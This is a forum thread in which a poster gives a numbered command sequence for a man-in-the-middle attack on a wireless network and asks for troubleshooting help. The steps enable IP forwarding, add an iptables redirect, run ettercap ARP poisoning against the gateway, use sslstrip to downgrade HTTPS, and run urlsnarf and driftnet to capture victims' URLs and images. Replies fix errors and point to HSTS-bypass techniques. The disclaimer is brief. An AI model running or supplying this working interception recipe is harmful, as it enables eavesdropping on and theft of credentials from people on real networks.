Forum Thread: MitM:Sslstrip+Ettercap+Urlsnarf+Driftnet

MitM:Sslstrip+Ettercap+Urlsnarf+Driftnet

Greeting's All,,

I've tested the above tools with some success and some fails.(kali USB persistence)
Sure their are many ways to accomplish a successful MitM or Rogue AP.

These seem to work just fine but with some limitations. I'm having an issue with ettercap returning:DHCP <mac address> DISCOVER, DHCP <mac address> REQUEST <ip address>.This continues over and over.

Mac address and ip address for different machines are included in that but it continues for all request.. Here's the setup:

Educational purposes only! Attempting this without the permission of network admin can put you in hot water! So please do your lab work

1) connect to AP
2)set etter.conf
#gedit /etc/ettercap/etter.conf
("ip tables" remove "#" ,add interface, add ports destination 80 , to 10000)
3)port forward
# echo 1 > /proc/sys/net/ipv4/ipforward
4)check port forward (should return 1)
#cat /proc/sys/net/ipv4/ip
forward
5)check, set iptables and save
#iptables -t nat -L
#iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
#iptables-save
6)start ettercap
#ettercap -Tqi wlan0 -M ARP:REMOTE /gateway/ //
7)New Terminal (set sslstrip)
#sslstrip -k -l 10000
8) New Terminal (set Urlsnarf)
#urlsnarf -i <interface>
9)New Terminal (set driftnet)
10)Create New Folder on desktop to save images
#driftnet -i <interface> <New Folder destination>

Ok, so those are the steps. All of which has worked in various environments ...But latest tests proved futile, ettercap returns ..(DHCP <mac address> DISCOVER, DHCP <mac address> REQUEST <ip address>).This continues with the same mac's being discovered and sending requests over and over.Why?..Wondering if it would be a good idea to install dhcp3-server as it is with a Rogue??

Need input Please....Thanks

5 Responses

I wouldn't know. If I were you I would use arpspoofing to get in the middle instead of ettercap as an alternative.

Thought i'd provide all with the soundtrack to that test. ;) ... https://www.youtube.com/watch?v=WROJl6QtNMk

P rob solved simply by update-upgrade....

#apt-get update && apt-get upgrade -y

Limitations though...Vic Browser has a lot to do with your success rate with this..I think we all here know that persistence always pays off ..So if this doesn't get you were you'd like to be, I suggest you checkout Ciuffy's post on MitMf and Defeating HSTS.... https://null-byte.wonderhowto.com/how-to/defeating-hsts-and-bypassing-https-with-dns-server-changes-and-mitm-framework-0162322/

bash: /proc/sys/net/ipv4/ipforward: Permission denied

how to fix this??

ettercap -Tqi wlan0 -M ARP:REMOTE /gateway/ // where i put the gateway?
here
ettercap -Tqi wlan0 -M ARP:REMOTE /192.168.1.1/ //
becuase is giving me this error: Incorrect number of token (///) in TARGET !!

Share Your Thoughts

  • Hot
  • Active